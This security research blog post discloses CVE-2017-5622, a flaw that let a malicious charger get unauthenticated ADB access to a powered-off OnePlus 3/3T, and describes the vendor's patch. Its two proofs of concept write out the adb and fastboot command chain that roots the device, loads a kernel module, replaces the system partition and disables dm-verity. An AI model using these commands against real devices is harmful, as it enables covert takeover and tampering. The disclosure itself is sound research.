Last month we [published](/2017/02/08/oneplus3-bootloader-vulns/) [CVE-2017-5626](/vulns/aleph-2017003) (patched in OxygenOS 4.0.2), a vulnerability which allowed attackers to effectively unlock a OnePlus 3/3T device (without a factory reset). Combining this with our also discovered [CVE-2017-5624](/vulns/aleph-2017002) (patched in OxygenOS 4.0.3) enabled a powerful attack against locked devices – persistent highly privileged code execution without any warning to the user and with access to user’s data (after the victim enters his credentials). One caveat from the attacker’s perspective, however, is that it either required physical or an authorized-ADB access to the device.
In this blog post we describe a new critical vulnerability [CVE-2017-5622](/vulns/aleph-2017004) in OnePlus 3/3T (OxygenOS 4.0.2 and below), which relaxes the attack prerequisites. Combining it with [CVE-2017-5626](/vulns/aleph-2017003) allows a malicious charger to **own your device if it’s hooked-up while being powered off** (the charger may also just wait until the battery is drained). Adding [CVE-2017-5624](/vulns/aleph-2017002) to the stack of exploited vulnerabilities will also help the attacker to hide the fact that he modified the device’s `system` partition.
We had responsibly reported [CVE-2017-5622](/vulns/aleph-2017004) to OnePlus Security that later fixed it in OxygenOS 4.0.3, [released]( last month. We would like to thank OnePlus Security for the efficient manner in which they handled this critical security issue.
##### Demos
First, before we dive into the technical details, here is a couple of video demonstrations of our PoCs.
The first video presents how the ‘charger’ can exploit [CVE-2017-5622](/vulns/aleph-2017004) & [CVE-2017-5626](/vulns/aleph-2017003) for gaining a **root shell, putting SELinux in `permissive` mode, and even executing kernel code**:
The second video shows how the ‘charger’ exploits [CVE-2017-5622](/vulns/aleph-2017004) , [CVE-2017-5624](/vulns/aleph-2017002) & [CVE-2017-5626](/vulns/aleph-2017003) for replacing the `system` partition in order to **install a privileged app**. Please note that once the replacement is complete, the victim has no indication that the device has been tampered with:
### Charger Boot Mode ADB Access (CVE-2017-5622)
When one connects a powered off OnePlus 3/3T device to a charger, the bootloader will load the platform with the `charger` boot mode (in other words: `ro.bootmode = charger`). The platform of course MUST NOT enable any sensitive USB interfaces because otherwise it could be attacked by malicious chargers, an attack also-known-as [‘Juice-jacking’](
Much to our surprise, when we first connected our powered off OnePlus 3/3T devices, we noticed that we had ADB access:
> adb shell
android:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
android:/ $ getprop ro.bootmode
android:/ $ getprop ro.boot.mode
android:/ $ getprop | grep -i oxygen
[ro.oxygen.version]: [4.0.2]
android:/ $
Since this does not (and should not!) normally happen when you connect a powered off Android device to a charger, we were quite puzzled. We had two immediate questions in mind:
### Question 1: Why is ADB running?
The answer to this question lies within the Android boot process, during which `init` executes several scripts under the `boot` partition. By running `ps`, it can be seen that `init` is the parent of `adbd`:
android:/ $ ps -x | grep adb
shell 444 1 12324 564 poll_sched 0000000000 S /sbin/adbd (u:2, s:10)
android:/ $ ps -x |grep init
root 1 0 15828 2496 SyS_epoll_ 0000000000 S /init (u:6, s:102)
Thus some `init` script instruction starts `adbd` when the platform runs in the `charger` boot mode. Taking a look at `init.qcom.usb.rc` reveals the following:
on charger
mkdir /dev/usb-ffs/adb 0770 shell shell
mount functionfs adb /dev/usb-ffs/adb uid=2000,gid=2000
write /sys/class/android_usb/android0/f_ffs/aliases adb
setprop persist.sys.usb.config adb
setprop sys.usb.configfs 0
setprop sys.usb.config adb
The `on charger` event is triggered if `ro.bootmode == charger`, as can be seen from Android 7.1.1’s [init.cpp](
std::string bootmode = property_get("ro.bootmode");
if (bootmode == 'charger') {
} else {
Therefore, the `sys.usb.config` property changes to `adb`, which then instructs `init` to run `adbd`, under `init.usb.rc`:
on property:sys.usb.config=adb && property:sys.usb.configfs=0
write /sys/class/android_usb/android0/enable 0
write /sys/class/android_usb/android0/idVendor 2A70 #VENDOR_EDIT Anderson@, 2016/09/21, modify from 18d1 to 2A70
write /sys/class/android_usb/android0/idProduct 4EE7
write /sys/class/android_usb/android0/functions ${sys.usb.config}
write /sys/class/android_usb/android0/enable 1
start adbd
setprop sys.usb.state ${sys.usb.config}
#### Question 2: Where is the ADB Authorization?
In order to protect against malicious USB ports (e.g. malicious chargers) targeting devices with `adbd` enabled, Android has had ADB authorization for quite some time (since Jelly-bean) – any attempt to gain an ADB session with an unauthorized device is now blocked.
So what’s different in OnePlus 3/3T? First, let’s take a peek at the AOSP implementation of `adbd`. The `adbd_main` routine reveals that there is some global flag, `auth_required`, that controls the ADB authorization:
int adbd_main(int server_port) {
if (ALLOW_ADBD_NO_AUTH && property_get_bool("", 0) == 0) {
auth_required = false;
This flag is then used by the `handle_new_connection` routine:
static void handle_new_connection(atransport* t, apacket* p) {
if (!auth_required) {
} else {
We can thus deduce that if OxygenOS used the stock `adbd`, then `` would be `0`, however:
android:/ $ getprop
android:/ $
Therefore, OxygenOS of OnePlus 3/3T contains a customized `adbd`! Since we don’t have the sources, we need to take a look at the binary. Decompiling it with IDA shows:
__int64 sub_400994()
if ( !(unsigned __int8)sub_440798("", 0LL) )
auth_required_50E088 = 0;
getprop("ro.wandrfmode", &v95, &byte_4D735C);
if ( !(unsigned int)strcmp(&v95, &a0_1) || !(unsigned int)strcmp(&v95, &a1_1) || !(unsigned int)strcmp(&v95, &a2) )
auth_required_50E088 = 0;
getprop("ro.boot.mode", &v94, &byte_4D735C);
if ( !(unsigned int)strcmp(&v94, 'charger') )
auth_required_50E088 = 0;
We can clearly see that OnePlus has customized the AOSP `adbd` s.t. `auth_required = 0` when the platform is started in the `charger` bootmode. (_Bonus points_: `ro.wandrfmode` relates to [CVE-2017-5623](/vulns/aleph-2017005) .)
### Exploitation
So what can we do with ADB access? First, we should note that although we can gain a shell, we do not have access to user data since the partition is both unmounted and encrypted. What we can do, however, is simply reboot into the `fastboot` mode by issuing `reboot bootloader`, and then replace the `boot` and/or `system` partitions by exploiting [CVE-2017-5626](/vulns/aleph-2017003) ! In order to remove any warning about the `system` partition modification, we may also exploit [CVE-2017-5624](/vulns/aleph-2017002) . It should be noted that if the device’s bootloader happens to be unlocked, then the charger does not even need [CVE-2017-5626](/vulns/aleph-2017003) .
As a reminder, [CVE-2017-5626](/vulns/aleph-2017003) (`fastboot oem 4F500301`) allowed one with `fastboot` access to effectively unlock the device, disregarding `OEM Unlocking`, without user confirmation and without erasure of user data (which normally occurs after lock-state changes). Moreover, the device still reports it’s locked after running this command. Exploiting this vulnerability alone allows for kernel code execution albeit with a 5 seconds warning message. [CVE-2017-5624](/vulns/aleph-2017002) allowed the attacker, again with `fastboot` access, to disable `dm-verity`, a feature which protects against tampering with the `system` partition, for example.
#### PoC 1: Charger Gains a root shell & Kernel Code Execution (CVE-2017-5622/6)
The attack begins when the victim connects a powered off device to the ‘charger’, which gains an ADB session [CVE-2017-5622](/vulns/aleph-2017004) , and reboots the device into `fastboot`:
> adb shell
android:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
android:/ $ reboot bootloader
> fastboot devices
cb010b5a fastboot
By exploiting [CVE-2017-5626](/vulns/aleph-2017003) the ‘charger’ replaces the `boot` image s.t. `adbd` runs as `root` and SELinux is in `permissive` mode (see the previous blog post):
> fastboot flash boot evilboot.img
target reported max download size of 440401920 bytes
sending 'boot' (14836 KB)...
OKAY [ 0.335s]
writing 'boot'...
FAILED (remote: Partition flashing is not allowed)
finished. total time: 0.358s
> fastboot oem 4F500301
OKAY [ 0.020s]
finished. total time: 0.021s
> fastboot flash boot evilboot.img
target reported max download size of 440401920 bytes
sending 'boot' (14836 KB)...
OKAY [ 0.342s]
writing 'boot'...
OKAY [ 0.135s]
finished. total time: 0.480s
That gives the charger a root shell, even before the user enters his credentials (but without access to user data!):
OnePlus3:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0
OnePlus3:/ # getenforce
The OnePlus 3/3T kernel is compiled with LKM enabled, so running kernel code does not even require patching / recompiling the kernel. So I created a tiny kernel module:
#include <linux/module.h>
#include <linux/kdb.h>
int init_module(void)
printk(KERN_ALERT "Hello From Evil LKM\n");
return 1;
The charger can then load it into the kernel:
OnePlus3:/data/local/tmp # insmod ./evil.ko
OnePlus3:/data/local/tmp # dmesg | grep "Evil LKM"
[19700121_21:09:58.970409]@3 Hello From Evil LKM
#### PoC 2: Charger Replaces the system Partition (CVE-2017-5622/4/6)
The vulnerabilities can be combined together for code execution in privileged SELinux domains, without any warning to the user and with access to original user data. In order to demonstrate this, I’ve modified the `system` partition, adding a privileged app. This can be done by placing an APK under `/system/priv-app/<APK_DIR>` which will eventually cause it to be added to the [priv_app domain]( (Don’t foger to `chcon` your APK and its containing directory!)
Again, the attack begins when the victim connects a powered off device to the ‘charger’, which gains an ADB session [CVE-2017-5622](/vulns/aleph-2017004) , and reboots the device into `fastboot`:
> adb shell
android:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
android:/ $ reboot bootloader
> fastboot devices
cb010b5a fastboot
By exploiting [CVE-2017-5626](/vulns/aleph-2017003) the ‘charger’ can replace the `system` partition with a malicious one:
> fastboot flash system evilsystem.img
target reported max download size of 440401920 bytes
erasing 'system'...
FAILED (remote: Partition erase is not allowed)
finished. total time: 0.014s
> fastboot oem 4F500301
[ 0.020s] finished. total time: 0.021s
> fastboot flash system evilsystem.img
target reported max download size of 440401920 bytes erasing 'system'...
OKAY [ 0.010s]
sending sparse 'system' 7/7 (268486 KB)...
OKAY [ 6.748s]
writing 'system' 7/7...
OKAY [ 3.291s]
finished. total time: 122.675s
By exploiting [CVE-2017-5624](/vulns/aleph-2017002) the ‘charger’ can disable `dm-verity`:
> fastboot oem disable_dm_verity
[ 0.034s] finished. total time: 0.036s
Indeed the app loads with the `priv_app` context:
1|OnePlus3:/ $ getprop | grep dm_verity
[ro.boot.enable_dm_verity]: [0]
OnePlus3:/ $ ps -Z | grep evilapp
u:r:priv_app:s0:c512,c768 u0_a16 4764 2200 1716004 74600 SyS_epoll_ 0000000000 S alephresearch.evilapp
### Patch
OnePlus has fixed the vulnerability by simply removing the ` { persist. } sys.usb.config ` related lines under the `on charger` event:
on charger
#yfb add to salve binder error log in poweroff charge
setrlimit 13 40 40
setprop sys.usb.config mass_storage
mkdir /dev/usb-ffs 0770 shell shell
mkdir /dev/usb-ffs/adb 0770 shell shell
mount functionfs adb /dev/usb-ffs/adb uid=2000,gid=2000
write /sys/class/android_usb/android0/f_ffs/aliases adb
#14(0xe) means reject cpu1 cpu2 cpu3online
write /sys/module/msm_thermal/core_control/cpus_offlined 14
#add by 2015/12/22, improve the performance of charging
write /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor powersave
write /sys/devices/system/cpu/cpu1/online 0
write /sys/devices/system/cpu/cpu2/online 0
write /sys/devices/system/cpu/cpu3/online 0
#yfb add to salve binder error log in poweroff charge
start srvmag_charger
# OnePlus 2
Last, OnePlus 2 also had the ` { persist } .sys.usb.config ` property set to `adb` under the `on charger` event of init.qcom.usb.rc:
on charger
mkdir /dev/usb-ffs 0770 shell shell
mkdir /dev/usb-ffs/adb 0770 shell shell
mount functionfs adb /dev/usb-ffs/adb uid=2000,gid=2000
write /sys/class/android_usb/android0/f_ffs/aliases adb
setprop persist.sys.usb.config adb
And also under `init.rc`:
on charger
mount ext4 /dev/block/bootdevice/by-name/system /system ro
setprop sys.usb.configfs 0
class_start charger
setprop sys.usb.config adb
Despite that, when we hooked-up our OnePlus 2 device, we didn’t manage to obtain an `adb` shell, although the USB interface was up & running:
> adb shell
error: device unauthorized.
This adb server's $ADB_VENDOR_KEYS is not set
Try 'adb kill-server' if that seems wrong.
Otherwise check for a confirmation dialog on your device.
> adb devices
List of devices attached
6b3ef4d5 unauthorized
Thus, OnePlus 2 is not vulnerable – in contrast to the OnePlus 3/3T case, the OnePlus 2 OxygenOS image had the ADB authorization left intact. Disassembling its `adbd` binary shows that it indeed does not have the `ro.boot.mode` `auth_required` [bypass](#question-2-where-is-the-adb-authorization).